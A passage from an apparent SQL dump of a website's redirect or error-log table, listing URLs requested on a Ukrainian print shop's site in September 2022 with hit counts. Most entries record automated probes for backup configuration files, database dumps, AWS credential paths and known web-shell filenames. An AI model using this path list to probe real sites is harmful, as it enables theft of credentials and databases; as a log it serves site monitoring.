02:03:22','0000-00-00 00:00:00',301),(24296,'https://ekvatorprint.com.ua/includes/db.php.bak',NULL,'','',2,0,'2022-09-09 02:34:31','0000-00-00 00:00:00',301),(24297,'https://ekvatorprint.com.ua/phpsender.php',NULL,'','',1,0,'2022-09-09 03:37:57','0000-00-00 00:00:00',301),(24298,'https://ekvatorprint.com.ua/includes/db.php.bck',NULL,'','',2,0,'2022-09-09 04:14:03','0000-00-00 00:00:00',301),(24299,'https://ekvatorprint.com.ua/ekvatorprint.com.ua.dump',NULL,'','',1,0,'2022-09-09 04:46:31','0000-00-00 00:00:00',301),(24300,'https://ekvatorprint.com.ua/includes/database.php~',NULL,'','',2,0,'2022-09-09 04:57:40','0000-00-00 00:00:00',301),(24301,'https://ekvatorprint.com.ua/ekvatorprint.dump',NULL,'','',1,0,'2022-09-09 05:29:53','0000-00-00 00:00:00',301),(24302,'https://ekvatorprint.com.ua/includes/database.bak',NULL,'','',2,0,'2022-09-09 05:32:41','0000-00-00 00:00:00',301),(24303,'https://ekvatorprint.com.ua/includes/database.bck',NULL,'','',2,0,'2022-09-09 06:46:32','0000-00-00 00:00:00',301),(24304,'https://ekvatorprint.com.ua/.aws/credentials.php',NULL,'','',1,0,'2022-09-09 07:18:48','0000-00-00 00:00:00',301),(24305,'https://ekvatorprint.com.ua/includes/database.php.bak',NULL,'','',3,0,'2022-09-09 07:20:07','0000-00-00 00:00:00',301),(24306,'https://ekvatorprint.com.ua/includes/database.php.bck',NULL,'','',4,0,'2022-09-09 07:43:11','0000-00-00 00:00:00',301),(24307,'https://ekvatorprint.com.ua/includes/connect.php~',NULL,'','',4,0,'2022-09-09 08:17:19','0000-00-00 00:00:00',301),(24308,'https://ekvatorprint.com.ua/includes/connect.bak',NULL,'','',4,0,'2022-09-09 08:37:47','0000-00-00 00:00:00',301),(24309,'https://ekvatorprint.com.ua/includes/connect.bck',NULL,'','',4,0,'2022-09-09 09:25:19','0000-00-00 00:00:00',301),(24310,'https://ekvatorprint.com.ua/includes/connect.php.bak',NULL,'','',3,0,'2022-09-09 09:38:58','0000-00-00 00:00:00',301),(24311,'https://ekvatorprint.com.ua/includes/connect.php.bck',NULL,'','',3,0,'2022-09-09 09:51:54','0000-00-00 00:00:00',301),(24312,'https://ekvatorprint.com.ua/includes/config.php.bak',NULL,'','',3,0,'2022-09-09 10:08:48','0000-00-00 00:00:00',301),(24313,'https://ekvatorprint.com.ua/includes/config.php.bck',NULL,'','',3,0,'2022-09-09 10:48:10','0000-00-00 00:00:00',301),(24314,'https://ekvatorprint.com.ua/includes/config.php~',NULL,'','',3,0,'2022-09-09 11:12:53','0000-00-00 00:00:00',301),(24315,'https://ekvatorprint.com.ua/includes/config.bak',NULL,'','',3,0,'2022-09-09 11:25:00','0000-00-00 00:00:00',301),(24316,'https://ekvatorprint.com.ua/includes/config.bck',NULL,'','',3,0,'2022-09-09 11:53:35','0000-00-00 00:00:00',301),(24317,'https://ekvatorprint.com.ua/include/connect.php~',NULL,'','',3,0,'2022-09-09 12:13:30','0000-00-00 00:00:00',301),(24318,'https://ekvatorprint.com.ua/include/connect.php.bak',NULL,'','',3,0,'2022-09-09 12:57:20','0000-00-00 00:00:00',301),(24319,'https://ekvatorprint.com.ua/include/connect.php.bck',NULL,'','',3,0,'2022-09-09 14:20:54','0000-00-00 00:00:00',301),(24320,'https://ekvatorprint.com.ua/include/db.php.bak',NULL,'','',2,0,'2022-09-09 15:07:56','0000-00-00 00:00:00',301),(24321,'https://ekvatorprint.com.ua/include/db.php.bck',NULL,'','',2,0,'2022-09-09 15:13:48','0000-00-00 00:00:00',301),(24322,'https://ekvatorprint.com.ua/include/db.php~',NULL,'','',2,0,'2022-09-09 15:45:06','0000-00-00 00:00:00',301),(24323,'https://ekvatorprint.com.ua/include/db.bak',NULL,'','',3,0,'2022-09-09 15:57:46','0000-00-00 00:00:00',301),(24324,'https://ekvatorprint.com.ua/include/db.bck',NULL,'','',3,0,'2022-09-09 16:30:28','0000-00-00 00:00:00',301),(24325,'https://ekvatorprint.com.ua/include/config.php~',NULL,'','',3,0,'2022-09-09 17:06:57','0000-00-00 00:00:00',301),(24326,'https://ekvatorprint.com.ua/include/config.bak',NULL,'','',2,0,'2022-09-09 18:51:54','0000-00-00 00:00:00',301),(24327,'https://ekvatorprint.com.ua/include/config.bck',NULL,'','',2,0,'2022-09-09 19:20:32','0000-00-00 00:00:00',301),(24328,'https://ekvatorprint.com.ua/include/config.php.bak',NULL,'','',2,0,'2022-09-09 20:28:40','0000-00-00 00:00:00',301),(24329,'https://ekvatorprint.com.ua/include/config.php.bck',NULL,'','',2,0,'2022-09-09 20:56:21','0000-00-00 00:00:00',301),(24330,'https://ekvatorprint.com.ua/config/db.php~',NULL,'','',3,0,'2022-09-09 21:25:19','0000-00-00 00:00:00',301),(24331,'https://ekvatorprint.com.ua/config/db.bak',NULL,'','',3,0,'2022-09-09 21:40:29','0000-00-00 00:00:00',301),(24332,'https://ekvatorprint.com.ua/config/db.bck',NULL,'','',3,0,'2022-09-09 22:05:19','0000-00-00 00:00:00',301),(24333,'https://ekvatorprint.com.ua/config/db.php.bak',NULL,'','',3,0,'2022-09-09 23:12:59','0000-00-00 00:00:00',301),(24334,'https://ekvatorprint.com.ua/config/db.php.bck',NULL,'','',3,0,'2022-09-09 23:21:32','0000-00-00 00:00:00',301),(24335,'https://ekvatorprint.com.ua/config/database.php~',NULL,'','',3,0,'2022-09-09 23:28:17','0000-00-00 00:00:00',301),(24336,'https://ekvatorprint.com.ua/config/database.bak',NULL,'','',3,0,'2022-09-10 00:13:45','0000-00-00 00:00:00',301),(24337,'https://ekvatorprint.com.ua/config/database.bck',NULL,'','',3,0,'2022-09-10 00:32:30','0000-00-00 00:00:00',301),(24338,'https://ekvatorprint.com.ua/config/database.php.bak',NULL,'','',3,0,'2022-09-10 01:10:47','0000-00-00 00:00:00',301),(24339,'https://ekvatorprint.com.ua/config/database.php.bck',NULL,'','',4,0,'2022-09-10 01:28:39','0000-00-00 00:00:00',301),(24340,'https://ekvatorprint.com.ua/config/connect.php~',NULL,'','',4,0,'2022-09-10 01:41:01','0000-00-00 00:00:00',301),(24341,'https://ekvatorprint.com.ua/config/connect.bak',NULL,'','',3,0,'2022-09-10 02:09:31','0000-00-00 00:00:00',301),(24342,'https://ekvatorprint.com.ua/config/connect.bck',NULL,'','',3,0,'2022-09-10 02:23:59','0000-00-00 00:00:00',301),(24343,'https://ekvatorprint.com.ua/config/connect.php.bak',NULL,'','',3,0,'2022-09-10 03:24:33','0000-00-00 00:00:00',301),(24344,'https://ekvatorprint.com.ua/config/connect.php.bck',NULL,'','',3,0,'2022-09-10 04:25:18','0000-00-00 00:00:00',301),(24345,'https://ekvatorprint.com.ua/config/config.php~',NULL,'','',3,0,'2022-09-10 04:38:18','0000-00-00 00:00:00',301),(24346,'https://ekvatorprint.com.ua/config/config.bak',NULL,'','',3,0,'2022-09-10 04:58:40','0000-00-00 00:00:00',301),(24347,'https://ekvatorprint.com.ua/config/config.bck',NULL,'','',3,0,'2022-09-10 05:10:43','0000-00-00 00:00:00',301),(24348,'https://ekvatorprint.com.ua/config/config.php.bak',NULL,'','',4,0,'2022-09-10 05:34:23','0000-00-00 00:00:00',301),(24349,'https://ekvatorprint.com.ua/config/config.php.bck',NULL,'','',4,0,'2022-09-10 05:58:04','0000-00-00 00:00:00',301),(24350,'https://ekvatorprint.com.ua/conf/db.php~',NULL,'','',3,0,'2022-09-10 06:10:27','0000-00-00 00:00:00',301),(24351,'https://ekvatorprint.com.ua/conf/db.bck',NULL,'','',3,0,'2022-09-10 06:20:45','0000-00-00 00:00:00',301),(24352,'https://ekvatorprint.com.ua/conf/db.bak',NULL,'','',3,0,'2022-09-10 06:51:49','0000-00-00 00:00:00',301),(24353,'https://ekvatorprint.com.ua/conf/db.php.bak',NULL,'','',3,0,'2022-09-10 07:04:47','0000-00-00 00:00:00',301),(24354,'https://ekvatorprint.com.ua/conf/db.php.bck',NULL,'','',3,0,'2022-09-10 07:45:36','0000-00-00 00:00:00',301),(24355,'https://ekvatorprint.com.ua/conf/database.php~',NULL,'','',3,0,'2022-09-10 08:25:03','0000-00-00 00:00:00',301),(24356,'https://ekvatorprint.com.ua/conf/database.bck',NULL,'','',3,0,'2022-09-10 09:08:38','0000-00-00 00:00:00',301),(24357,'https://ekvatorprint.com.ua/conf/database.bak',NULL,'','',3,0,'2022-09-10 09:30:24','0000-00-00 00:00:00',301),(24358,'https://ekvatorprint.com.ua/conf/database.php.bak',NULL,'','',3,0,'2022-09-10 10:06:23','0000-00-00 00:00:00',301),(24359,'https://ekvatorprint.com.ua/conf/database.php.bck',NULL,'','',3,0,'2022-09-10 10:25:44','0000-00-00 00:00:00',301),(24360,'https://ekvatorprint.com.ua/conf/connect.php~',NULL,'','',3,0,'2022-09-10 11:17:34','0000-00-00 00:00:00',301),(24361,'https://ekvatorprint.com.ua/conf/connect.bck',NULL,'','',3,0,'2022-09-10 11:48:48','0000-00-00 00:00:00',301),(24362,'https://ekvatorprint.com.ua/conf/connect.bak',NULL,'','',2,0,'2022-09-10 12:11:05','0000-00-00 00:00:00',301),(24363,'https://ekvatorprint.com.ua/conf/connect.php.bak',NULL,'','',2,0,'2022-09-10 12:21:49','0000-00-00 00:00:00',301),(24364,'https://ekvatorprint.com.ua/conf/connect.php.bck',NULL,'','',2,0,'2022-09-10 13:20:44','0000-00-00 00:00:00',301),(24365,'https://ekvatorprint.com.ua/conf/config.php~',NULL,'','',2,0,'2022-09-10 13:53:46','0000-00-00 00:00:00',301),(24366,'https://ekvatorprint.com.ua/conf/config.bck',NULL,'','',2,0,'2022-09-10 14:13:26','0000-00-00 00:00:00',301),(24367,'https://ekvatorprint.com.ua/conf/config.bak',NULL,'','',2,0,'2022-09-10 14:36:29','0000-00-00 00:00:00',301),(24368,'https://ekvatorprint.com.ua/conf/config.php.bak',NULL,'','',2,0,'2022-09-10 14:56:26','0000-00-00 00:00:00',301),(24369,'https://ekvatorprint.com.ua/db.tgz',NULL,'','',3,0,'2022-09-10 17:15:07','0000-00-00 00:00:00',301),(24370,'https://ekvatorprint.com.ua/db.bck',NULL,'','',2,0,'2022-09-10 17:31:06','0000-00-00 00:00:00',301),(24371,'https://ekvatorprint.com.ua/conf/config.php.bck',NULL,'','',1,0,'2022-09-10 17:36:14','0000-00-00 00:00:00',301),(24372,'https://ekvatorprint.com.ua/conf.gz',NULL,'','',3,0,'2022-09-10 17:53:43','0000-00-00 00:00:00',301),(24373,'https://ekvatorprint.com.ua/.aws/config.php',NULL,'','',1,0,'2022-09-10 18:13:16','0000-00-00 00:00:00',301),(24374,'https://ekvatorprint.com.ua/conf.rar',NULL,'','',2,0,'2022-09-10 18:32:21','0000-00-00 00:00:00',301),(24375,'https://ekvatorprint.com.ua/conf.zip',NULL,'','',2,0,'2022-09-10 18:52:15','0000-00-00 00:00:00',301),(24376,'https://ekvatorprint.com.ua/conf.tar.gz',NULL,'','',2,0,'2022-09-10 19:13:15','0000-00-00 00:00:00',301),(24377,'https://ekvatorprint.com.ua/conf.tar',NULL,'','',2,0,'2022-09-10 19:45:13','0000-00-00 00:00:00',301),(24378,'https://ekvatorprint.com.ua/conf.bz2',NULL,'','',2,0,'2022-09-10 20:31:42','0000-00-00 00:00:00',301),(24379,'https://ekvatorprint.com.ua/conf.tgz',NULL,'','',2,0,'2022-09-10 20:56:07','0000-00-00 00:00:00',301),(24380,'https://ekvatorprint.com.ua/conf.bck',NULL,'','',2,0,'2022-09-10 21:25:58','0000-00-00 00:00:00',301),(24381,'https://ekvatorprint.com.ua/config.gz',NULL,'','',2,0,'2022-09-10 22:10:38','0000-00-00 00:00:00',301),(24382,'https://ekvatorprint.com.ua/config.rar',NULL,'','',2,0,'2022-09-10 22:49:37','0000-00-00 00:00:00',301),(24383,'https://ekvatorprint.com.ua/config.zip',NULL,'','',2,0,'2022-09-10 23:07:10','0000-00-00 00:00:00',301),(24384,'https://ekvatorprint.com.ua/config.tar.gz',NULL,'','',2,0,'2022-09-10 23:17:51','0000-00-00 00:00:00',301),(24385,'https://ekvatorprint.com.ua/config.tar',NULL,'','',2,0,'2022-09-10 23:58:56','0000-00-00 00:00:00',301),(24386,'https://ekvatorprint.com.ua/config.bz2',NULL,'','',2,0,'2022-09-11 00:42:00','0000-00-00 00:00:00',301),(24387,'https://ekvatorprint.com.ua/config.tgz',NULL,'','',1,0,'2022-09-11 01:01:33','0000-00-00 00:00:00',301),(24388,'https://ekvatorprint.com.ua/config.bck',NULL,'','',2,0,'2022-09-11 01:18:24','0000-00-00 00:00:00',301),(24389,'https://ekvatorprint.com.ua/inc.gz',NULL,'','',2,0,'2022-09-11 01:49:19','0000-00-00 00:00:00',301),(24390,'https://ekvatorprint.com.ua/inc.rar',NULL,'','',2,0,'2022-09-11 02:03:49','0000-00-00 00:00:00',301),(24391,'https://ekvatorprint.com.ua/inc.bz2',NULL,'','',2,0,'2022-09-11 03:45:33','0000-00-00 00:00:00',301),(24392,'https://ekvatorprint.com.ua/inc.bck',NULL,'','',2,0,'2022-09-11 05:37:25','0000-00-00 00:00:00',301),(24393,'https://ekvatorprint.com.ua/include.gz',NULL,'','',2,0,'2022-09-11 05:53:31','0000-00-00 00:00:00',301),(24394,'https://ekvatorprint.com.ua/include.rar',NULL,'','',2,0,'2022-09-11 06:16:49','0000-00-00 00:00:00',301),(24395,'https://ekvatorprint.com.ua/wp-content/themes/seotheme/mar.php',NULL,'www.google.com','',15,0,'2022-09-11 06:35:45','0000-00-00 00:00:00',301),(24396,'https://ekvatorprint.com.ua/include.bz2',NULL,'','',2,0,'2022-09-11 07:59:31','0000-00-00 00:00:00',301),(24397,'https://ekvatorprint.com.ua/include.bck',NULL,'','',2,0,'2022-09-11 08:25:36','0000-00-00 00:00:00',301),(24398,'https://ekvatorprint.com.ua/includes.gz',NULL,'','',2,0,'2022-09-11 08:57:40','0000-00-00 00:00:00',301),(24399,'https://ekvatorprint.com.ua/includes.rar',NULL,'','',2,0,'2022-09-11 09:06:43','0000-00-00 00:00:00',301),(24400,'https://ekvatorprint.com.ua/includes.zip',NULL,'','',3,0,'2022-09-11 09:13:54','0000-00-00 00:00:00',301),(24401,'https://ekvatorprint.com.ua/includes.tar.gz',NULL,'','',3,0,'2022-09-11 09:24:34','0000-00-00 00:00:00',301),(24402,'https://ekvatorprint.com.ua/includes.tar',NULL,'','',3,0,'2022-09-11 09:56:04','0000-00-00 00:00:00',301),(24403,'https://ekvatorprint.com.ua/includes.bz2',NULL,'','',3,0,'2022-09-11 10:13:43','0000-00-00 00:00:00',301),(24404,'https://ekvatorprint.com.ua/includes.tgz',NULL,'','',3,0,'2022-09-11 10:25:11','0000-00-00 00:00:00',301),(24405,'https://ekvatorprint.com.ua/includes.bck',NULL,'','',3,0,'2022-09-11 10:49:34','0000-00-00 00:00:00',301),(24406,'https://ekvatorprint.com.ua/database.tgz',NULL,'','',3,0,'2022-09-11 11:29:18','0000-00-00 00:00:00',301),(24407,'https://ekvatorprint.com.ua/database.bck',NULL,'','',3,0,'2022-09-11 11:37:47','0000-00-00 00:00:00',301),(24408,'https://ekvatorprint.com.ua/wp/wp-config.php~',NULL,'','',3,0,'2022-09-11 12:24:53','0000-00-00 00:00:00',301),(24409,'https://ekvatorprint.com.ua/wp/wp-config.bak',NULL,'','',4,0,'2022-09-11 12:44:36','0000-00-00 00:00:00',301),(24410,'https://ekvatorprint.com.ua/wp/wp-config.bck',NULL,'','',4,0,'2022-09-11 12:57:03','0000-00-00 00:00:00',301),(24411,'https://ekvatorprint.com.ua/wp/wp-config.php.bak',NULL,'','',3,0,'2022-09-11 13:55:28','0000-00-00 00:00:00',301),(24412,'https://ekvatorprint.com.ua/wp/wp-config.php.bck',NULL,'','',3,0,'2022-09-11 14:29:03','0000-00-00 00:00:00',301),(24413,'https://ekvatorprint.com.ua/makhdamxshell.php',NULL,'','',2,0,'2022-09-11 14:30:42','0000-00-00 00:00:00',301),(24414,'https://ekvatorprint.com.ua/0byte',NULL,'','',2,0,'2022-09-11 14:31:00','0000-00-00 00:00:00',301),(24415,'https://ekvatorprint.com.ua/blog/fw.php/',NULL,'','',1,0,'2022-09-11 14:31:50','0000-00-00 00:00:00',301),(24416,'https://ekvatorprint.com.ua/date.php',NULL,'','',2,0,'2022-09-11 14:31:59','0000-00-00 00:00:00',301),(24417,'https://ekvatorprint.com.ua/public/403.php',NULL,'','',2,0,'2022-09-11 14:32:46','0000-00-00 00:00:00',301),(24418,'https://ekvatorprint.com.ua/punisher.php',NULL,'','',1,0,'2022-09-11 14:32:47','0000-00-00 00:00:00',301),(24419,'https://ekvatorprint.com.ua/wp-admin/radio.php',NULL,'','',2,0,'2022-09-11 14:33:24','0000-00-00 00:00:00',301),(24420,'https://ekvatorprint.com.ua/wp-includes/991176.php',NULL,'','',2,0,'2022-09-11 14:33:34','0000-00-00 00:00:00',301),(24421,'https://ekvatorprint.com.ua/wp-includes/about.php',NULL,'','',2,0,'2022-09-11 14:33:37','0000-00-00 00:00:00',301),(24422,'https://ekvatorprint.com.ua/blog/wp-config.php~',NULL,'','',3,0,'2022-09-11 14:46:45','0000-00-00 00:00:00',301),(24423,'https://ekvatorprint.com.ua/blog/wp-config.php.bak',NULL,'','',3,0,'2022-09-11 15:42:14','0000-00-00 00:00:00',301),(24424,'https://ekvatorprint.com.ua/wordpress/wp-config.php~',NULL,'','',4,0,'2022-09-11 15:54:58','0000-00-00 00:00:00',301),(24425,'https://ekvatorprint.com.ua/help.php',NULL,'www.google.com','',7,0,'2022-09-11 16:11:07','0000-00-00 00:00:00',301),(24426,'https://ekvatorprint.com.ua/wordpress/wp-config.php.bak',NULL,'','',3,0,'2022-09-11 16:38:47','0000-00-00 00:00:00',301),(24427,'https://ekvatorprint.com.ua/dbdump.sql',NULL,'','',3,0,'2022-09-11 17:20:06','0000-00-00 00:00:00',301),(24428,'https://ekvatorprint.com.ua/localhost.sql',NULL,'','',2,0,'2022-09-11 18:20:25','0000-00-00 00:00:00',301),(24429,'https://ekvatorprint.com.ua/localhostdb.sql',NULL,'','',2,0,'2022-09-11 18:43:32','0000-00-00 00:00:00',301),(24430,'https://ekvatorprint.com.ua/localhost_db.sql',NULL,'','',2,0,'2022-09-11 19:44:10','0000-00-00 00:00:00',301),(24431,'https://ekvatorprint.com.ua/localhost-db.sql',NULL,'','',2,0,'2022-09-11 20:15:35','0000-00-00 00:00:00',301),(24432,'https://ekvatorprint.com.ua/localhost_database.sql',NULL,'','',2,0,'2022-09-11 20:27:56','0000-00-00 00:00:00',301),(24433,'https://ekvatorprint.com.ua/localhost-database.sql',NULL,'','',2,0,'2022-09-11 20:56:03','0000-00-00 00:00:00',301),(24434,'https://ekvatorprint.com.ua/localhost_dump.sql',NULL,'','',1,0,'2022-09-12 00:39:10','0000-00-00 00:00:00',301),(24435,'https://ekvatorprint.com.ua/localhost-dump.sql',NULL,'','',1,0,'2022-09-12 00:48:22','0000-00-00 00:00:00',301),(24436,'https://ekvatorprint.com.ua/localhostbackup.sql',NULL,'','',2,0,'2022-09-12 01:46:30','0000-00-00 00:00:00',301),(24437,'https://ekvatorprint.com.ua/localhost_backup.sql',NULL,'','',2,0,'2022-09-12 02:07:22','0000-00-00 00:00:00',301),(24438,'https://ekvatorprint.com.ua/localhost-backup.sql',NULL,'','',2,0,'2022-09-12 03:09:16','0000-00-00 00:00:00',301),(24439,'https://ekvatorprint.com.ua/backuplocalhost.sql',NULL,'','',2,0,'2022-09-12 03:27:16','0000-00-00 00:00:00',301),(24440,'https://ekvatorprint.com.ua/backup-localhost.sql',NULL,'','',2,0,'2022-09-12 03:35:15','0000-00-00 00:00:00',301),(24441,'https://ekvatorprint.com.ua/backup_localhost.sql',NULL,'','',2,0,'2022-09-12 04:30:34','0000-00-00 00:00:00',301),(24442,'https://ekvatorprint.com.ua/ekvatorprintdb.sql',NULL,'','',3,0,'2022-09-12 04:38:15','0000-00-00 00:00:00',301),(24443,'https://ekvatorprint.com.ua/ekvatorprint-db.sql',NULL,'','',4,0,'2022-09-12 05:12:00','0000-00-00 00:00:00',301),(24444,'https://ekvatorprint.com.ua/ekvatorprint-database.sql',NULL,'','',4,0,'2022-09-12 06:14:25','0000-00-00 00:00:00',301),(24445,'https://ekvatorprint.com.ua/ekvatorprint_dump.sql',NULL,'','',3,0,'2022-09-12 07:00:57','0000-00-00 00:00:00',301),(24446,'https://ekvatorprint.com.ua/ekvatorprint-dump.sql',NULL,'','',3,0,'2022-09-12 07:25:01','0000-00-00 00:00:00',301),(24447,'https://ekvatorprint.com.ua/ekvatorprintbackup.sql',NULL,'','',3,0,'2022-09-12 07:59:12','0000-00-00 00:00:00',301),(24448,'https://ekvatorprint.com.ua/ekvatorprint-backup.sql',NULL,'','',3,0,'2022-09-12 08:08:57','0000-00-00 00:00:00',301),(24449,'https://ekvatorprint.com.ua/backupekvatorprint.sql',NULL,'','',3,0,'2022-09-12 08:50:09','0000-00-00 00:00:00',301),(24450,'https://ekvatorprint.com.ua/backup-ekvatorprint.sql',NULL,'','',3,0,'2022-09-12 09:39:59','0000-00-00 00:00:00',301),(24451,'https://ekvatorprint.com.ua/backup_ekvatorprint.sql',NULL,'','',3,0,'2022-09-12 10:02:53','0000-00-00 00:00:00',301),(24452,'https://ekvatorprint.com.ua/ekvatorprint.com.uadb.sql',NULL,'','',3,0,'2022-09-12 10:18:19','0000-00-00 00:00:00',301),(24453,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-db.sql',NULL,'','',3,0,'2022-09-12 10:42:41','0000-00-00 00:00:00',301),(24454,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_database.sql',NULL,'','',3,0,'2022-09-12 11:08:16','0000-00-00 00:00:00',301),(24455,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-database.sql',NULL,'','',3,0,'2022-09-12 11:21:10','0000-00-00 00:00:00',301),(24456,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_dump.sql',NULL,'','',3,0,'2022-09-12 12:08:08','0000-00-00 00:00:00',301),(24457,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-dump.sql',NULL,'','',2,0,'2022-09-12 12:21:08','0000-00-00 00:00:00',301),(24458,'https://ekvatorprint.com.ua/ekvatorprint.com.uabackup.sql',NULL,'','',2,0,'2022-09-12 12:31:19','0000-00-00 00:00:00',301),(24459,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_backup.sql',NULL,'','',2,0,'2022-09-12 12:38:36','0000-00-00 00:00:00',301),(24460,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-backup.sql',NULL,'','',2,0,'2022-09-12 12:46:31','0000-00-00 00:00:00',301),(24461,'https://ekvatorprint.com.ua/backupekvatorprint.com.ua.sql',NULL,'','',2,0,'2022-09-12 12:57:04','0000-00-00 00:00:00',301),(24462,'https://ekvatorprint.com.ua/backup-ekvatorprint.com.ua.sql',NULL,'','',1,0,'2022-09-12 13:09:37','0000-00-00 00:00:00',301),(24463,'https://ekvatorprint.com.ua/backup_ekvatorprint.com.ua.sql',NULL,'','',1,0,'2022-09-12 13:57:26','0000-00-00 00:00:00',301),(24464,'https://ekvatorprint.com.ua/dbdump.sql.gz',NULL,'','',1,0,'2022-09-12 14:39:50','0000-00-00 00:00:00',301),(24465,'https://ekvatorprint.com.ua/localhost.sql.gz',NULL,'','',2,0,'2022-09-12 16:06:04','0000-00-00 00:00:00',301),(24466,'https://ekvatorprint.com.ua/localhostdb.sql.gz',NULL,'','',3,0,'2022-09-12 16:35:17','0000-00-00 00:00:00',301),(24467,'https://ekvatorprint.com.ua/localhost_db.sql.gz',NULL,'','',3,0,'2022-09-12 16:55:47','0000-00-00 00:00:00',301),(24468,'https://ekvatorprint.com.ua/localhost-db.sql.gz',NULL,'','',3,0,'2022-09-12 17:17:04','0000-00-00 00:00:00',301),(24469,'https://ekvatorprint.com.ua/localhost_database.sql.gz',NULL,'','',3,0,'2022-09-12 17:54:36','0000-00-00 00:00:00',301),(24470,'https://ekvatorprint.com.ua/localhost-database.sql.gz',NULL,'','',3,0,'2022-09-12 18:36:27','0000-00-00 00:00:00',301),(24471,'https://ekvatorprint.com.ua/localhost_dump.sql.gz',NULL,'','',3,0,'2022-09-12 19:14:29','0000-00-00 00:00:00',301),(24472,'https://ekvatorprint.com.ua/localhost-dump.sql.gz',NULL,'','',4,0,'2022-09-12 19:29:53','0000-00-00 00:00:00',301),(24473,'https://ekvatorprint.com.ua/localhostbackup.sql.gz',NULL,'','',4,0,'2022-09-12 19:57:18','0000-00-00 00:00:00',301),(24474,'https://ekvatorprint.com.ua/localhost_backup.sql.gz',NULL,'','',4,0,'2022-09-12 20:40:24','0000-00-00 00:00:00',301),(24475,'https://ekvatorprint.com.ua/localhost-backup.sql.gz',NULL,'','',4,0,'2022-09-12 21:21:56','0000-00-00 00:00:00',301),(24476,'https://ekvatorprint.com.ua/backuplocalhost.sql.gz',NULL,'','',4,0,'2022-09-12 22:00:19','0000-00-00 00:00:00',301),(24477,'https://ekvatorprint.com.ua/backup-localhost.sql.gz',NULL,'','',4,0,'2022-09-12 22:20:28','0000-00-00 00:00:00',301),(24478,'https://ekvatorprint.com.ua/backup_localhost.sql.gz',NULL,'','',4,0,'2022-09-12 22:42:11','0000-00-00 00:00:00',301),(24479,'https://ekvatorprint.com.ua/ekvatorprint.com.uadb.sql.gz',NULL,'','',4,0,'2022-09-12 22:57:30','0000-00-00 00:00:00',301),(24480,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-db.sql.gz',NULL,'','',3,0,'2022-09-12 23:33:01','0000-00-00 00:00:00',301),(24481,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_database.sql.gz',NULL,'','',3,0,'2022-09-13 00:13:24','0000-00-00 00:00:00',301),(24482,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-database.sql.gz',NULL,'','',3,0,'2022-09-13 00:33:01','0000-00-00 00:00:00',301),(24483,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_dump.sql.gz',NULL,'','',3,0,'2022-09-13 01:14:08','0000-00-00 00:00:00',301),(24484,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-dump.sql.gz',NULL,'','',3,0,'2022-09-13 01:23:15','0000-00-00 00:00:00',301),(24485,'https://ekvatorprint.com.ua/ekvatorprint.com.uabackup.sql.gz',NULL,'','',3,0,'2022-09-13 01:39:33','0000-00-00 00:00:00',301),(24486,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_backup.sql.gz',NULL,'','',3,0,'2022-09-13 01:50:00','0000-00-00 00:00:00',301),(24487,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-backup.sql.gz',NULL,'','',3,0,'2022-09-13 02:00:05','0000-00-00 00:00:00',301),(24488,'https://ekvatorprint.com.ua/backupekvatorprint.com.ua.sql.gz',NULL,'','',3,0,'2022-09-13 02:23:19','0000-00-00 00:00:00',301),(24489,'https://ekvatorprint.com.ua/backup-ekvatorprint.com.ua.sql.gz',NULL,'','',4,0,'2022-09-13 02:53:46','0000-00-00 00:00:00',301),(24490,'https://ekvatorprint.com.ua/backup_ekvatorprint.com.ua.sql.gz',NULL,'','',4,0,'2022-09-13 03:07:58','0000-00-00 00:00:00',301),(24491,'https://ekvatorprint.com.ua/ekvatorprintdb.sql.gz',NULL,'','',4,0,'2022-09-13 04:30:27','0000-00-00 00:00:00',301),(24492,'https://ekvatorprint.com.ua/ekvatorprint-db.sql.gz',NULL,'','',3,0,'2022-09-13 05:05:30','0000-00-00 00:00:00',301),(24493,'https://ekvatorprint.com.ua/ekvatorprint-database.sql.gz',NULL,'','',3,0,'2022-09-13 05:37:02','0000-00-00 00:00:00',301),(24494,'https://ekvatorprint.com.ua/ekvatorprint_dump.sql.gz',NULL,'','',3,0,'2022-09-13 05:46:40','0000-00-00 00:00:00',301),(24495,'https://ekvatorprint.com.ua/ekvatorprint-dump.sql.gz',NULL,'','',3,0,'2022-09-13 06:07:47','0000-00-00 00:00:00',301),(24496,'https://ekvatorprint.com.ua/ekvatorprintbackup.sql.gz',NULL,'','',3,0,'2022-09-13 06:58:12','0000-00-00 00:00:00',301),(24497,'https://ekvatorprint.com.ua/ekvatorprint-backup.sql.gz',NULL,'','',3,0,'2022-09-13 07:09:03','0000-00-00 00:00:00',301),(24498,'https://ekvatorprint.com.ua/backupekvatorprint.sql.gz',NULL,'','',1,0,'2022-09-13 09:21:20','0000-00-00 00:00:00',301),(24499,'https://ekvatorprint.com.ua/backup-ekvatorprint.sql.gz',NULL,'','',1,0,'2022-09-13 10:04:13','0000-00-00 00:00:00',301),(24500,'https://ekvatorprint.com.ua/backup_ekvatorprint.sql.gz',NULL,'','',1,0,'2022-09-13 10:20:34','0000-00-00 00:00:00',301),(24501,'https://ekvatorprint.com.ua/dbdump.sql.tar',NULL,'','',1,0,'2022-09-13 11:31:04','0000-00-00 00:00:00',301),(24502,'https://ekvatorprint.com.ua/localhost.sql.tar',NULL,'','',2,0,'2022-09-13 12:37:23','0000-00-00 00:00:00',301),(24503,'https://ekvatorprint.com.ua/localhostdb.sql.tar',NULL,'','',2,0,'2022-09-13 12:46:10','0000-00-00 00:00:00',301),(24504,'https://ekvatorprint.com.ua/localhost_db.sql.tar',NULL,'','',2,0,'2022-09-13 13:26:33','0000-00-00 00:00:00',301),(24505,'https://ekvatorprint.com.ua/localhost-db.sql.tar',NULL,'','',2,0,'2022-09-13 13:46:45','0000-00-00 00:00:00',301),(24506,'https://ekvatorprint.com.ua/localhost_database.sql.tar',NULL,'','',2,0,'2022-09-13 14:19:19','0000-00-00 00:00:00',301),(24507,'https://ekvatorprint.com.ua/localhost-database.sql.tar',NULL,'','',2,0,'2022-09-13 